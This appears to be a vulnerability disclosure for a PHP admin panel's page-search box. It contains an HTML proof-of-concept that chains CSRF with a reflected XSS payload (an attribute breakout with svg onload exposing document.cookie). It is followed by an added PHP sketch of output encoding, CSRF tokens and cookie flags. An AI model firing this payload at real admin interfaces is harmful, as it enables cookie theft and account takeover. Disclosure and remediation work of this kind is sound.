Reflective XSS exists in the administrator's page management office
In the search box, enter "><a src=" to trigger XSS
Reuse CSRF vulnerability to obtain cookies
POC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/index.php?g=&m=admin_page&a=index" method="POST">
<input type="hidden" name="start_time" value="" />
<input type="hidden" name="end_time" value="" />
<input type="hidden" name="keyword" value=""><svg onload=alert(document.cookie)><a src="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
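Added example, not part of the original report and not the project's code: a defensive sketch of the three controls this PoC gets past, namely attribute-context encoding of the reflected keyword, a per-session CSRF token on the POST, and cookie flags that keep the session cookie away from document.cookie. Every function name and the csrf_token field are assumptions; the sample keyword is the string quoted in the description.

```php
<?php
declare(strict_types=1);

// All function and field names below are hypothetical stand-ins (assumptions).

// Vulnerable pattern: the posted keyword is echoed into the value attribute
// unchanged, so a value beginning with "> closes the attribute and the tag.
function render_search_box_unsafe(string $keyword): string
{
    return '<input type="text" name="keyword" value="' . $keyword . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
function render_search_box(string $keyword): string
{
    $safe = htmlspecialchars($keyword, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="keyword" value="' . $safe . '">';
}

// CSRF check: an auto-submitted cross-site form cannot know the session's token.
// is_string() rejects array-valued fields before hash_equals() sees them.
function csrf_token_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($given)
        && $expected !== '' && hash_equals($expected, $given);
}

// Cookie flags: HttpOnly hides the session cookie from script, and
// SameSite=Lax stops browsers attaching it to cross-site POSTs.
function harden_session_cookie(): bool
{
    return session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
}

// Demo on constructed input (call the cookie setup before any output is sent).
harden_session_cookie();
$keyword = '"><a src="';
$session = ['csrf_token' => bin2hex(random_bytes(32))];
$forged  = ['keyword' => $keyword, 'start_time' => '', 'end_time' => ''];
$genuine = $forged + ['csrf_token' => $session['csrf_token']];

echo render_search_box_unsafe($keyword), PHP_EOL; // attribute is broken out of
echo render_search_box($keyword), PHP_EOL;        // quotes and brackets encoded
var_dump(csrf_token_valid($session, $forged));    // request without a token
var_dump(csrf_token_valid($session, $genuine));   // request carrying the token
```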